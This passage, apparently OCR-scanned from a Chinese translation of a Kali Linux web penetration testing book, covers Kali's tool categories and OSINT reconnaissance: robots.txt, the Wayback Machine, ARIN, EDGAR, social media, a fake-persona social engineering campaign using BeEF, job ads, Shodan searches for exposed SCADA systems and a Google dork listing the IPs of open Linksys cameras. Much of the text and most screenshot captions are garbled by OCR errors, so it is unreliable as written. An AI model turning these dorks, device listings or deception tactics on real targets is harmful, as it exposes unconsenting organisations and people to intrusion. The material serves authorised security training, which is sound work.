在 有 些 Kali 的 安装 方法 中 ， 会 要 求 你 设置 root 账 户 的 密码 。 在 Kali Linux 启 动 后 ， 输 入 root 账 
户 的 用 户 名 和 你 设 定 的 密码 。 如 果 下 载 的 是 Kali VM 映 像 文 件 ， 你 需要 知道 root 密 码 。 默 认 的 用 
户 名 是 root ， 密 公 是 toor。 


1.6 Kali 工 具 集 概述 


Kali Linux 提 供 aes 寺 定 制 的 专门 为 渗透 测试 设计 的 工具 。 工 具 部 会 按 下 图 中 下 拉 选 单 
所 示 的 方式 按 组 分 类 来 


Applications Places T Wed May 15, 2:33 AM 


curity Tools 
oO. Information Gathering 
"in Vulnerability Analysis 


* c Web Applications 


* rt Password Attacks 
| 5? Wireless A i 


g/ Spo 


Maintaining Acces 
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O Information Gathering QUERE) ”这些 都 是 侦察 工具 ， 用 来 收集 目标 网 络 和 设备 的 
数据 。 在 这 类 工具 中 ， 从 找 出 设备 的 工具 到 查看 使 用 的 协议 的 工具 都 有 。 

Q Vulnerability Analysis (漏洞 分 析 ) ”这 个 类 别 中 的 工具 主要 用 来 评测 系统 ， 找 出 漏洞 。 
通常 ， 这 些 工具 会 针对 前 面 用 信息 搜集 侦察 工具 发 现 的 系统 米 运 行 。 

口 Web Applications (Web 应 用 ) “这 个 类 别 中 的 工具 用 来 对 Web 服 务 硕 进行 审计 和 漏洞 利 
用 。 我 们 在 本 书 中 提 到 的 很 多 审计 工具 都 来 目 这 个 类 别 。 不 过 Web 应 用 也 不 全 是 指针 对 
Web 服 务 需 的 攻击 工具 ,它们 也 可 能 指 用 做 网 络 服务 的 基于 Web 的 工具 。 举 个 例子 ,在 这 
个 类 别 中 你 也 能 看 到 Web 代 理工 具 。 

Q Password Attacks 〈 密 码 攻击 ) ”这 类 工具 主要 用 来 进行 暴力 破解 密码 ， 或 是 离线 计算 
密码 或 身份 认证 中 的 共享 密 钥 。 

O Wireless Attacks (ZKE) ”这 类 工具 主要 是 对 无 线 协议 中 发 现 的 漏洞 加 以 利用 。 在 
这 里 你 可 以 找到 802.11 工 具 , 包括 aircrack 、airmon 和 破解 无 线 密码 的 工具 。 除 此 之 外 ， 这 
个 类 别 中 也 包含 跟 RFID 和 蓝牙 漏洞 相关 的 工具 。 很 多 情况 下 ， 这 个 类 别 中 的 工具 需要 跟 
一 块 可 以 由 Kali 配 置 成 混杂 模式 ( Promiscuous Mode ) 的 无 线 网 卡 搭配 使 用 。 

口 Exploitation Tools 〈 漏 洞 利用 工具 ) ” 这 些 工 具 主 要 用 来 对 系统 中 找 出 的 漏洞 加 以 利用 。 
通常 ， 汤 洞 会 在 对 目标 进行 的 汤 洞 评估 环 市 被 找 出 。 

O Sniffing and Spoofing〈 网 络 嗅 探 和 欺骗 ) ”这 类 工具 用 于 抓 取 网 络 上 的 数据 包 、 算 改 网 
络 上 的 数据 包 、 自 定义 数据 包 以 及 仿造 网 站 。 这 个 类 别 中 还 有 一 些 VoIP 重 建 工 具 。 

口 Maintaining Access (保持 访问 权限 ) ”保持 访问 权限 工具 是 在 建立 了 到 目标 系统 或 网 络 
的 入 口 后 使 用 的 。 通 常 ， 被 侵入 的 系统 会 有 多 个 钓 子 钓 回 攻 击 者 ， 当 攻击 者 使 用 的 漏洞 
被 发 现 和 修复 时 ， 它 会 提供 蔡 代 路 径 。 

O Reverse Engineering (MJ LITA) “这 类 工具 用 来 拆 解 可 执行 程序 和 调试 程序 。 逆 
问 工 程 的 目的 是 分 析 一 个 程序 是 如 何 开发 的 ， 这 样 就 可 以 对 它 进行 复制 、 修 改 ， 或 者 通 
过 它 开 发 其 他 程序 。 逆 回 工 程 也 用 在 恶意 软件 分 析 中 ， 用 来 查 明 可 执行 程序 都 做 了 哪些 
事情 ， 或 是 被 研究 者 用 来 尝试 找到 软件 应 用 中 的 漏洞 。 

O Stressing Testing 《压力 测试 工具 ) ”这 类 工具 用 来 测试 一 个 系统 能 处 理 多 少数 据 。 过 载 
的 系统 可 能 会 出 现 预期 外 的 结果 ， 比 如 导致 控制 网 络 通信 的 设备 打开 所 有 的 通信 通道 ， 
或 是 导致 系统 关闭 ( 也 称 为 拒绝 服务 攻击 )。 

口 Hardware Hacking 《硬件 破解 工具 ) 这 类 工具 包含 Android 工 具 ( 可 以 划分 为 移动 类 ) 
和 Arduino 工 具 ( 用 来 编程 和 控制 其 他 小 型 电子 设备 )。 

O Forensics (WELA) “这 类 工具 主要 用 来 监测 和 分 析 计 算 机 网 络 的 流量 和 计算 机 应 用 。 

Q Reporting Tools 〈 报 告 生成 工具 ) “这 类 工具 用 来 将 渗透 测试 活动 中 发 现 的 信息 转换 成 
可 交付 的 文档 。 

O System Services 〈 系 统 服务 ) “用 这 类 工具 你 可 以 启用 或 禁用 Kali 的 服务 。 服 务 聚 合 到 
了 BeEF、Dradis、HTTP 、Metasploit、MySQL 和 SSH 这 几 个 小 分 类 中 。 


20 第 1 章 渗透 测试 概要 及 环境 配置 


Kali Linux 还 会 包含 其 他 一 些 工具 ， 比 如 Web 浏 览 器 、 修 改 Kali Linux 在 网 络 
上 呈现 形式 的 工具 的 快速 链接 、 搜 索 工 具 和 其 他 一 些 有 用 的 工具 。 


1.7 小结 


本 章 介 绍 了 Web 应 用 渗透 测试 ， 并 对 配置 Kali Linux 环 境 做 了 概述 。 一 开始 ， 我 们 就 定义 了 
进行 渗透 测试 服务 的 最 佳 实践 ， 其 中 对 风险 做 了 定义 ,也 对 各 种 服务 的 区 别 做 了 介绍 。 需 要 掌握 
的 是 渗透 测试 跟 其 他 安全 服务 的 区 别 在 哪里 , 如 何 正确 定义 某 个 服务 等 级 的 工作 范围 , 还 要 知道 
执行 任务 的 最 佳 方 法 。 跟 潜在 的 客户 坦诚 说 明 合 理 的 预期 有 助 于 获得 合作 机 会 , 也 有 助 于 简化 确 
定 可 接受 工作 范围 的 过 程 。 

本 草 接 下 来 概要 介绍 了 Kali Linux。 内 容 包 括 如 何 下 载 你 需要 的 Kali Linux 版 本 、 安 装 Kali 
Linux 的 多 种 方式 ， 之 后 还 对 工具 集 做 了 概要 介绍 。 下 一 章 将 会 介绍 如 何 对 目标 进行 侦察 。 这 是 
进行 渗透 测试 服务 的 第 一 步 ， 也 是 最 关键 的 一 步 。 


1A (reconnaissance ) 这 个 术语 源 目 军事 战略 ， 意 为 措 清 友 匣 占领 范围 以 外 区 域 的 情况 , 收 
集 敌 方 情 报 以 便 后 续 分 析 或 攻击 。 对 计算 机 系统 的 侦察 本 质 上 与 此 类 似 ,， 即 渗透 测试 人 员 或 黑客 
在 对 目标 系统 发 起 攻击 之 前 先 尝试 掌握 尽 可 能 多 有 关 目 标 环境 和 系统 特征 的 信息 。 这 也 称 作 确立 
目标 的 足迹 。 侦察 本 质 上 一 般 是 被 动 的 , 在 许多 情况 下 只 要 你 没有 跟 非 授权 系统 进行 三 次 握手 就 
不 算 非法 ( 不过， 我 们 不 是 律师 ， 没 法 提供 法 律 上 的 建议 )。 


侦察 的 例子 太 多 了 。 在 公共 资源 ( 比如 谷歌 ) 上 研究 目标 ， 监 测 公 司 雇 员 的 活动 以 了 解 其 工 
作 模 式 ， 扫描 网 络 或 系统 以 收集 信息 ( 如 生产 商 类 型 、 操 作 系 统 和 打开 的 通信 端口 )， 这些 都 算 。 
收集 到 的 有 关 目 标的 信息 越 多 , 找到 最 简便 和 最 快速 方法 完成 渗透 目标 的 概率 就 越 大 , 找到 避 开 
现 有 安全 部 署 的 最 佳 方 法 的 概率 也 越 大 。 还 有 , 屋 劲 了 目标 很 有 可 能 导致 特定 的 攻击 路 径 被 关闭 
(加强 戒备 )。Kali 的 官方 口号 说 得 非常 贴切 . 


The quieter you become, the more you are able to hear. ( 越 是 安静 ， 侦 穴 的 收获 就 越 多 。) 


侦察 服务 应 该 包含 大 量 的 文档 记录 ,因为 侦察 阶段 发 现 的 数据 有 可 能 会 跟 渗 透 测试 活动 后 面 
的 菏 个 点 关联 。 客户 也 想 知 道 特定 数据 是 怎么 得 到 的 ,他 们 可 能 会 问 数 据 的 来 源 。 这 里 有 个 客户 
提问 的 例子 。 客户 会 问 这 些 数据 是 通过 哪些 工具 获得 的 , 或 者 是 通过 哪些 公共 资源 获得 的 ( 比如 ， 
在 合 歌 中 通过 提交 的 特定 搜索 查询 就 能 获得 数据 )。 只 告诉 客户 “我 已 经 完成 了 目标 ”是 不 够 的 ， 
因为 渗透 测试 的 目的 就 是 为 了 找 出 薄弱 环节 ， 以 便 将 来 修补 。 


2.1 侦察 的 对 象 


口 目标 的 背景 ”目标 的 业务 关注 的 是 什么 领域 ? 

Q 目标 的 伙伴 ”目标 的 业务 伙伴 、 经 销 丙 和 客户 部 是 谁 ? 

D 目标 在 安全 方面 的 投资 ”他们 的 安全 政策 做 过 宣传 吗 ? 他 们 在 安全 上 的 评 在 投资 有 什么 
计划 ? 用 户 的 安全 意识 是 什么 状态 ? 

Q 目标 的 业务 和 安全 政策 ”他们 的 业务 是 如 何 运 作 的 ? 运作 环节 中 有 什么 次 在 的 溥 弱 环 下 吗 ? 


O 目标 的 员工 ”他们 的 员工 部 是 什么 样 的 人 群 ” 你 如 何 能 将 他 们 变 成 你 攻击 时 的 资产 ? 

口 定义 目标 ”哪个 目标 是 最 容易 攻 隐 的 ?哪个 目标 是 应 该 避 开 的 ? 

口 目标 的 网 络 人 和 设备 是 如 何在 网 络 上 进行 通信 的 ? 

O 目标 的 防御 ”他们 做 了 什么 样 的 安全 部 署 ? 部 闭 在 了 哪里 ? 

O 目标 的 技术 ”在 电邮 、 网 络 流量 控制 、 信 息 和 存储 、 身 份 认 证 等 方面 他 们 使 用 的 是 什么 样 
的 技术 ?这 些 技 术 容 易 被 攻击 吗 ? 


Kali Linux 包 含 一 个 提供 很 多 工具 的 类 别 ， 名 为 Information Gathering ( 信息 收集 )， 是 专门 
给 侦察 任务 用 的 。 如 果 有 要 把 信息 收集 类 别 中 提供 的 所 有 工具 和 方法 介绍 一 这 ,可 能 得 男 外 写 一 本 
书 了 。 本 草 将 着 重 介 绍 各 种 Web 应 用 侦察 工具 ， 然 后 介绍 那些 能 在 互联 网 上 找到 的 顶尖 工具 ， 以 
及 Kali Linux 提 供 的 工具 。 
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侦察 工作 一 开始 ， 束 应 收集 尽 可 能 多 跟 目标 有 关联 的 人 群 和 业务 的 信息 。 正 如 《孙子 兵法 》 
PARA AA B: “AIA, ARAR” 作为 渗透 测试 人 员 ， 你 需要 知 提 你 的 目标 。 如 宁 你 的 
日 标 惟 巧 是 网 站 ,那么 你 应 该 观察 该 网 站 的 方方面面 。 这 样 就 能 对 该 网 站 如 何 维护 和 运行 有 更 深 
的 理解 。 出 色 的 侦察 工作 有 助 于 发 现 更 多 淤 在 的 渍 洞 。 

在 公共 信息 来 源 上 能 发 现 的 信息 会 多 得 尺 人 。 我 们 发 现 的 信息 多 得 难以 想象 , 比如 经 过 分 类 
的 文档 、 密 码 、 源 洞 报告 、 私 密 上 照片 ,还 有 可 以 访问 的 监控 摄像 涉 。 许 多 渗透 测试 项 目的 对 和 象 都 
征 利用 公共 消息 来 源 找 到 的 信息 。 这 里 我 们 会 介绍 从 公共 消息 源 上 收集 信息 的 一 些 基 本 知识 。 


2.2.1 公司 网 站 


我 们 可 以 从 目标 的 网 站 上 获取 很 多 有 用 的 信息 。 许 多 公司 网 站 都 会 列 出 他 们 的 管理 团队 、 公 
共 人 物 及 来 自 招聘 团队 和 HR 联系 人 的 成 员 。 这 些 人 都 可 以 成 为 其 他 人 研究 工作 和 社会 工程 攻击 的 
WTA. 


通过 查看 其 他 信息 ， 如 合伙 人 、 当 前 的 招聘 广告 、 业 务 信 息 以 及 安全 政策 等 ,我 们 还 能 获得 
更 多 有 用 的 信息 。 对 革 个 价值 很 高 的 合伙 人 的 侦察 可 能 跟 对 主要 目标 的 侦察 一 样 重 要 ,因为 合伙 
人 能 够 提供 获取 情报 的 新 来 源 。 这 里 举 个 例子 , 你 可 以 对 在 目标 总 部 管理 客服 团队 的 已 经 建立 联 
系 的 资源 下 手 。 


在 这 些 网 站 上 ,Robots.txt 文 件 是 可 以 公开 访问 的 。 这 个 文件 会 通过 网 络 爬 虫 排 除 协 以 ( Robots 
Exclusion Protocol ) 告诉 Web 机 需 人 【也 称 为 搜索 引擎 爬虫 ) 哪些 信息 是 可 见 的 ， 哪 些 是 不 可 见 
|. Disallow: /语句 会 告诉 浏览 器 不 要 访问 某 个 来 源 ， 不 过 ， 当 研究 者 对 目标 不 希望 透 圳 给 
公共 访问 的 信息 感 兴趣 时 ，Disallow 文 件 就 可 以 被 忽略 了 。 
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Robots.txt 文 件 可 以 在 目标 网 站 的 根 目 录 中 找到 。 
的 URL 上 之 后 ， 看 起 来 如 下 面 的 截图 中 所 示 : 


C! https://www.facebook.com/robots.txt 


举 个 例子 ， 将 Robots.txt 文 件 加 到 Facebook 


# Notice: if you would like to crawl Facebook you can 

# contact us here: http://www.facebook.com/apps/site scraping tos.php 
# to apply for white listing. Our general terms are available 

# at http://www.facebook.com/apps/site scraping tos terms.php 


User-agent: baiduspider 


Disallow: 
Disallow: 
Disallow: 
Disallow: 
Disallow: 
Disallow: 
Disallow: 
Disallow: 
Disallow: 
Disallow: 
Disallow: 
Disallow: 
Disallow: 
Disallow: 
Disallow: 
Disallow: 
Disallow: 


/ac.php 

/ae.php 

/ajax/ 

/album.php 
/ap.php 
/autologin.php 
/checkpoint/ 
/feeds/ 

/l.php 

/o.php 

/p.php 

/photo.php 

/photo comments.php 
/photo search.php 
/photos.php 
/share.php 
/sharer/ 


2.2.2 Web 历史 归档 网 站 


大 多 数 公开 网 站 的 归档 版 本 都 能 在 信息 归档 网 站 ( 如 位 于 archive.org 的 WayBack Machine ) 
上 找到 。 在 目标 网 站 的 早期 版 本 中 ,我 们 能 找到 一 些 感 兴趣 的 信息 ， 如 目标 不 希望 在 当前 网 站 版 
本 中 出 现 的 早期 组 织 结 构 框 图 、 电 话 号 码 、 客 户 情 报 、 在 特定 文件 中 列 出 的 系统 信息 ( 如 view 
source 或 /robots.txt )、 早 期 的 商业 伙伴 、 在 后 续 版 本 中 修复 的 漏洞 ， 以 及 其 他 的 有 用 信息 。 要 知 
道 可 以 公开 访问 的 信息 很 难 彻底 删除 ; 这 样 ， 历 史 信 息 归 档 对 侦察 研究 也 很 有 价值 。 


要 访问 WayBack Machine， 可 访问 http://archive.org， 你 能 在 页 面 中 间 看 到 Internet Archive 
WayBack Machine 几 个 单词 ， 如 下 面 的 截图 所 示 : 


Web Video Texts Audio Projects About Account I e 


Al Media Tyoes | Upos 


Dr EE 


Riding wih thé Bt Savers 


Anonymous User top w 


Welcorne to the Archive R55 


The intemet Archive. a 50* (CX 3) non-peofr, is puding 
Friday March 22nd Movie ang 
Anonymous: We Are Legon 


Panel about 


Uayackineenine 
= 
| | | 


ee. Toe ate 
iom SERIES prevents the 
vict milieu, this artist lc din 


Bitoon Cash Convener Box 


Browse 
(by arywordt) 


ER 


Méthode du Tafani e pour l'instruction des. 
w Karuka 1 voL (009); 


Amera oh da !) 
men take chis az nd Rus 
U story and a great song a 


Grateful Dead Live at Filmore East on dag 19 
Set 3 (partial) O1. //Sogar Magnolia 02. Dark Star > 03 
St. Stephen 


£f actos 
cael ka 
| 


The Amorican Rivals of Sherdock Holmes 
= a we 


> (4. Not Fade Away -> 05 


Qalaid Al Juman Fi Faw Sd Al Tarjuman 
Average rating 


Ozzie and Mamet misc ep 02 
Average rating. UC C E 


Zach Deputy Live at The Bark and Blues Club on 
2011-02-12 
Average ming: (CN INN 


Average roisg 


24 $23 WR 


输入 你 要 训 览 的 URL, 看 看 它 是 否 抓 取 过 任何 归档 文件 。 归 档 历 史 也 能 在 这 里 看 到 , 如 下 面 
的 稚 图 所 不 : 


INTERNET ARCHIVE http://www.lancope.com Go Wayback! 


Wapak Mahne http /www.lancope.com has been crawled 300 times going all the way back to February 20, 2001. 


A crawl can be a duplicate of the last one. It happens about 2596 of the time across 420,000,000 websites. FAQ 


don lin TNT d dis ie, 


EXH 


对 于 渗透 测试 人 员 来 说 ， 这 是 一 个 很 有 用 的 工具 ， 因 为 它 不 会 在 你 的 目标 上 留 下 任何 证 据 。 
实际 上 , 通过 这 个 工具 你 根本 就 不 需要 直接 访问 目标 。 所 有 的 信息 都 被 WayBack Machine 归 档 到 
了 线 上 。 下 面 两 个 截图 分 别 显 示 了 2002 年 和 和 2013 年 的 www.lancope.com: 


contact us site map Careers press room 


Lancope 


Keyword Search 


EN 
eJ 


STEALTH 
(WATCH 


CLICK HERE 


| 
| 
Network Security | 
to Combat Today’s 
Advanced Hacker 


Lancope develops next-generation intrusion 
detection appliances for high-speed corporate 
networks. SIGN UP 


FOR THE 
Lancope's StealthWatch™ is an IDS appliance that provides a new and STEALTH 
unique approach to network intrusion detection. Our advanced threat WATCH 
management system monitors, detects and responds to security breaches WEBDEMO 
and internal misuse, recognizing advanced attack methods that do not bear 
signatures, such as undocumented, encrypted and DoS attacks. In addition, 
it performs on high-speed networks running full duplex 100 Mbps through 


77 
Gigabit line speeds. Read more about StealthWatch™ and its innovative “(HERE 


flow-based architecture. 


Our innovative technology will dramatically improve your ability to detect 
anomalies, and to combat today’s advanced hacker - the ones using new Lancope News: 


and undocumented attacks that have no known signature. 
StealthWatch selected by eWeek 


as “Most Impressive" of 2001. 
WEEK M. Most | m pressive E Lancope IDS Looks Into the 
Unknown to Detect Threats 


eWeek Analyst Francis Chu hails StealthWatch as the "Most 
" ue n get: 
Impressive" of 2001, and says that it "Redefines the Way Latest Hacker Target: Routers 


Corporations Use Intrusion Detection Systems." Intrusion Battleground Evolves 
Security's Hidden Benefits 
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| Eu BUNS Tht Lol 
T NE To Hori webinar on AFT : È 
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X 5 Intelii Advanced ider Thre l 
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Fey wrap ee pn The Dents, GS and ider Ires. Simia fus Ther 


2.2.3 区域 互 联网 注册 管理 机 构 


区 域 互 联网 注册 管理 机 构 (RIR, Regional Internet Registry ) 是 管理 世界 范 轩 内 特定 区 域内 
了 资源 分 配 和 注册 的 组 织 。 世 界 范围 内 主要 有 五 个 区 域 互 联网 注册 管理 机 构 。 管 理 美 国 、 加 拿 大 
和 部 分 加 勒 比 区 域 的 机 构 位 于 www.arin.net。 你 可 以 收集 跟 目 标 (如 Lancope ) 有 关 的 信息 ， 如 下 
面 的 稚 图 所 示 : 


Name Lancope 
Handle LANCOP 


Street 3155 Royal Drive 
Building 100 


City Alpharetta 
State/Province GA 
Postal Code 


Country US 


Registration Date 2002-06-21 


Last Updated 2011-09-24 
Comments 

RESTful Link 

See Also 

See Also 


See Also 


Jo 
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2.24 电子 化 数据 收集 、 分 析 及 检索 (EDGAR) 


电子 化 数据 收集 、 分 析 及 检索 (EDGAR, Electronic Data Gathering, Analysis and Retrieval ) 
数据 库 含 有 目 1994 年 起 所 有 公司 的 注册 声明 、 阶 段 报 告 以 及 其 他 形式 的 信息 。 根 据 法 律 , 在 美国 
注册 的 公司 都 需要 备案 ， 所 有 的 信息 都 可 公开 访问 。 下 面 两 个 截图 显示 的 是 搜索 Lancope 时 找到 
的 公开 文档 : 


Filing Detail 
SEC Home » Search the Next-Generation EDGAR System » Company Search » Current Page 


Form REGDEX - Notice of Sale of Securities [Regulation D and Section 4/6) of the Securities Act of 1933] 


Filing Date 
2008-04-25 

Accepted 
2008-04-30 

Documents 
1 


Filing Date Changed 
2008-04-30 
Effectiveness Date 
12:50:12 2008-04-25 


Document Format Files 


Seq Description 

1 AUTO-GENERATED PAPER DOCUMENT 
Scanned paper document 
Complete submission text file 


LANCOPE I 


NC (Filer) CIK: 0001178004 (see all company filings) 


IRS No.: 000000000 
Type: REGDEX | Act: 34 | File No.: 021-45780 | Film No.: 08045849 


OMB APPROVAL 
UNITED STATES OMB Number: 3235-0076 


SECURITIES AND EXCHANGE COMMISSION Expires: April 30, 2008 


I 


Washington, D.C. 20549 Estimated average burden hours per 
form 16.00 


FORM D 
NOTICE OF SALE OF SECURITIES SEC USE ONLY 
PURSUANT TO REGULATION D, 
SECTION 4(6), AND/OR 
YIFORM LIMITED OFFE 


APR 30 2008 E EG as eed) ESSE 


Name of Offering ([ ] check if this is an amendment and name nas THOMSON RE TER 


Issuance of Warrants for shares of Common Stoc 


Filing Under (Check box(es) that apply): []Rule 504  [ JRule 505 [X]Rule 506 Í Section 4(6) — [JULOE Section 


Type of Filing: (x]New Filing [ JAmendment 
A. BASIC IDENTIFICATION DATA yu 7 5 70ff8 


1. Enter the information requested about the issuer 
Name of [ssuer ([ ] check if this is an amendment and name has changed, and indicate change.) Wi 106 


Lancope, Inc. 
Address of Executive Offices 


(Number and Street, City, State, Zip Code) Telephone Number (Including Area Code) 


3650 Brookside Parkway, Brookside Concourse 100, Suite 400, 770-225-6500 


Alpharetta, GA 30022 
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2.2.5 ”社交 媒体 资源 


现在 是 社交 媒体 的 天 下 ， 而 且 大 多 数 情况 下 ， 其 中 的 信息 都 可 公开 访问 。 大 多 数 人 都 有 
Facebook, LinkedIn, 、 博 客 或 是 其 他 形式 的 存 有 有 用 信息 的 云 账 户 。 这 些 信 息 可 以 用 做 对 目标 当 
六 员工 或 前 员工 进行 社会 工程 情报 工作 的 一 种 手段 。 简 单 的 例子 是 搜索 Glassdoorcom, 根据 反馈 
找 出 那些 对 目标 不 满 的 前 员工 。 


有 许多 搜 人 的 Web 资 源 ， 比 如 Maltego (Kali Linux 中 有 )， 可 以 将 流行 的 社交 媒体 、 公 开 记 录 
和 招聘 网 站 合 在 一 起 来 根据 有 限 的 信息 定位 某 个 人 ， 如 姓 或 名 。 人 研究 人 员 可 以 搜集 到 很 多 信息 ， 
比如 此 人 居住 过 的 地 方 、 从 事 过 的 工作 、 跟 他 们 有 交往 的 人 、 特 殊 的 兴趣 爱好 、 最 喜欢 的 体育 团 
队 以 及 其 他 对 将 来 的 研究 和 社会 工程 攻击 有 用 的 数据 。 


2.2.6 ”信任 关系 


大 多 数 人 都 会 很 自然 地 相信 别人 , 并 假设 发 布 到 公开 信息 源 的 信息 都 是 真实 的 。 为 了 测试 这 
个 观点 , 本 书 的 作者 在 社交 媒体 上 创建 了 一 个 假冒 的 人 , 假装 成 目标 公司 的 新 员工 。 假冒 的 人 最 
终 成 了 目标 合作 伙伴 的 友 邻 ， 通 过 这 个 身份 我 们 将 链接 到 BeEF 系 统 ( 用 来 危害 有 漏洞 的 Web 浏 
AAO 的 节日 贺卡 发 出 去 , 从 被 危害 的 系统 中 抓 取 敏感 信息 。 我们 还 对 整个 组 织 进行 了 结构 绘制 ， 
获取 了 网 络 信息 , 甚至 不 经 过 任何 内 部 电邮 或 电话 就 让 他 们 把 硬件 送 到 了 我 们 这 里 。 我 们 假冒 的 
那个 人 ，Emily Williams， 并 不 真实 存在 ， 却 收 到 了 录用 通知 ， 还 拿 到 了 内 部 信息 以 及 参加 由 日 
标 举 办 的 一 些 活 动 的 资格 。 信 息 就 是 权力 ， 人 们 会 将 它 授 予 看 起 来 值得 信任 的 请 求 者 。 


这 个 项 目的 详情 可 以 参考 这 里 : http://www.thesecurityblogger.com/?p=1903 。 


2.2.7 ”招聘 广告 


招聘 广告 会 包含 跟 目标 环境 相关 的 大 量 信息 。 职 位 列表 会 说 明 安 闭 的 是 什么 系统 、 谁 会 管理 
这 些 系统 、 雇 员 有 多 少 以 及 屠 员 的 技能 水 平 。 人 力 资 源 代 表 通 并 痢 急于 跟 有 望 成 为 正式 员工 的 候 
选 人 分 享 各 种 信息 ， 这 可 以 作为 获取 内 部 信息 的 一 个 途径 。 这 里 举 个 例子 。 我 们 可 以 根据 招聘 
Oracle 开 发 人 员 的 广告 , 问 一 些 诸如 “管理 员 可 以 远程 工作 吗 ”“ 他 们 如 何 访问 那些 系统 ”之 类 的 
问题 来 了 解 目标 用 的 是 什么 便 件 、Oracle 的 版 本 、 现 在 和 之 前 的 管理 员 名 字 、 现 有 的 运 维 问题 、 
安全 隐患 ， 以 及 访问 系统 的 途径 。 


另 一 个 值得 审视 的 途径 是 在 流行 的 招聘 版 面 上 该 职位 的 预期 薪水 、 福 利 以 及 流动 率 等 信息 。 
这 些 趋 势 可 能 会 提供 新 的 攻击 方向 。Glassdoorcom 就 是 这 类 数据 的 一 个 常见 信息 源 。 


2.2.8 位 置 
目标 在 互联 网 安全 上 的 投入 通常 可 以 参考 其 在 物理 安全 上 的 投入 水 平 来 判定 。 人 们 都 会 假 
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定 , 配 有 栅栏 和 全 副 武装 的 保安 的 建筑 通 稼 会 比 那 些 位 于 公共 建筑 中 的 目标 在 互联 网 安全 上 投入 
更 多 。 在 线 地 图 服务 ， 如 合 歌 地 图 ， 可 以 帮助 找 出 哪里 部 团 了 物理 安全 ， 以 及 人 们 菲 近 /远离 日 
标的 趋势 。 其 他 有 趣 的 领域 包括 找到 渗透 测试 人 员 可 以 暂时 停留 扫描 无 线 网 络 的 地 方 , 以 及 绕 过 
访问 控制 的 方法 ， 比 如 更 换 着 次 、 使 用 门禁 卡 来 获得 物理 访问 。 


2.2.9 Shodan 搜 索引 擎 


Shodan 是 一 个 可 以 通过 各 式 各 样 过 滤 需 〈 如 系统 访问 提示 横 条 中 的 元 数据 ) 找 出 特定 设备 
(如 计算 机 、 路 由 器 、 服 务 带 等 ) 的 搜索 引擎 。 举 个 例子 ， 你 可 以 搜索 特定 的 系统 ， 如 运行 着 某 
个 版 本 软件 一 一 IOS 版 本 15.0(1) EX 一 一 的 Cisco 3850. 


下 面 的 例子 就 是 搜索 文 持 公开 互联 网 访问 〈 理 论 上 认为 不 应 存在 ) 的 所 有 SCADA 系 统 的 一 
个 用 例 。 然 而 ，Shodan 会 说 明 并 非 所 有 这 类 系统 都 不 支持 公开 访问 。SCADA 系 统 控 制 的 是 电力 
管理 和 污水 治理 之 类 的 事情 ， 所 以 可 以 找到 公开 访问 入 口 的 这 类 系统 部 极其 粳 糕 1 


«4$ SHODAN 


services 

HTTP 

NetBIOS 

SMB 

FTP 

HTTP Alternate 


Top Countries 
United States 
Canada 
Finland 
Sweden 
Denmark 


Top Cities 
Calgary 
H 
Sylvan Lake 
Burnaby 
Stockholm 


Top Organizations 
Telus Communications 
Nucleus Information Se... 
Telefonica de Espana 


Comcast Business Commu... 


Hetzner Online AG 


401 Unauthorized 
78.70.11.144 
TeliaSonera AB 


E ui 


Em Stanga 


TB8-7T0-11-144-no148B8.business.tella.ccom 


65.98.173.75 


Conaway Preservation Group, LLC 
BE Palm Desert 


cust-55-88-173-75.8tatic.o1.com 


401 Authorization Required 
142.59.128.56 

Windows XP 

AGT 


I+] ca gary 


diü-137-237-225.abhslia.telus.net 


HTTF!1.0 401 Unauthorized 
Date: Thu, 28 Feb 2013 17:57:16 GMT 
Server: Boald .93.15 


Connection: close 


WWW- Authenticate: Basic realm="webS CADA" 


Content-Type: text/html 


NetBIOS Response 
Servername: SCADA 
MAC: b8:ac:6£:81:7b:c9 


Names: 

SCADA «xz 

WORE GROUP «x 

SCADA <Ox20> 

WORKGROUP Da le> 

WORKGROUP «(x 1d» 
MSBROWSE  süxl- 
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2.2.10 Google Hacking 


Google Hacking 是 对 Web 应 用 进行 侦察 时 最 常见 的 搜索 引擎 形式 。Google Hacking 利 用 谷歌 搜 
索引 擎 中 的 高 级 操作 来 定位 搜索 结 末 中 的 特定 字符 串 。 搜 索 过 滤 硕 可 精确 定位 市 有 漏洞 的 Web 应 
用 的 特定 版 本 ， 比 如 在 intitle:"index of "操作 符 的 结果 中 找 出 Powered by Apache， 就 能 看 
到 网 站 的 目录 结构 , 或 是 找 出 日 志文 件 ， 如 ws _ftp.log 等 包含 敏感 IP 地 址 信息 的 文件 。 下面 的 一 些 
截图 演示 了 在 谷歌 中 搜索 Linksys 来 找 出 那些 可 以 公开 访问 的 Linksys 监 控 探 头 。 第 一 幅 图 显示 的 
是 调用 搜索 引擎 时 的 搜索 命令 , 后 面 跟 的 是 示例 搜索 结 采 。 最 后 一 幅 截 图 显示 的 是 可 以 通过 这 项 
技术 找到 的 一 个 监控 探头 链接 。 


Google inurl:main.cgi linksys 


Web Images Maps shopping More = Search tools 


Linksys Wireless-G Internet Video Camera 
92.71.245.81:1027/main.cgi?next_file=index.htm ~ 


Linksys. Ver 2.12, Home | View Video | Setup | Linksys WEB | Help | Exit. 


Linksys Wireless-G FIZ Internet Camera with Audio 
mam-camera.dnsalias .net/main.cgi?next_file=index.htm ~ 

WVC200. Wireless-G PTZ Internet Camera with Audio, Home| View Video| Setup| 
Linksys Web| Exit. Connected User Number: 0. © Copyright 2007 Cisco ... 


Linksys Web Camera 
177.142.48.3:1028/main.cgi?next_file=index.htm ~ 


Linksys. Ver 2.13, Home | View Video | Setup | Linksys WEB | Help | Exit. 


Linksys Internet Camera 
81.196.11.12/main.cgi'?next file2v video.htm ~ 
LINKSYS PVC2300. 


Linksys Wireless-G Internet Video Camera 
72.250.149.128:1024/main.cgi'?next filesindex.htm ~ 


Linksys. Ver 2.11, Home | View Video | Setup | Linksys WEB | Help | Exit. 
You've visited this page 4 times. Last visit: 3/19/13 


Linksys Wireless-G PTZ Internet Camera with Audio 
213.67.110.104:1024/main.cgi'?next fileemain.htm ~ 


WVC200. Linksys Wireless-G PTZ Internet Camera with Audio. Home, |, View Video, 
|, Setup, |, Linksys Web, |, Exit. Image Resolution. 640x480, 320x240, 160x ... 


Linksys Wireless-G PTZ Internet Camera with Audio 
66.11.106.28:8181/main.cgi?next_file=main.htm ~ 

WVC200. Wireless-G PTZ Internet Camera with Audio, Home| View Video| Setup| 
Linksys Web| Exit. Image Resolution. 640*480, 320*240, 160*128. Northwest... 
You've visited this page 3 times. Last visit: 3/19/13 


LINKSYS’ WVC80N | 


A Division of Cisco Systems, Inc. 


Wireless-N Internet Home Monitoring Camera Home | View Video | Setup |  LinksysWeb | Help | Exit 


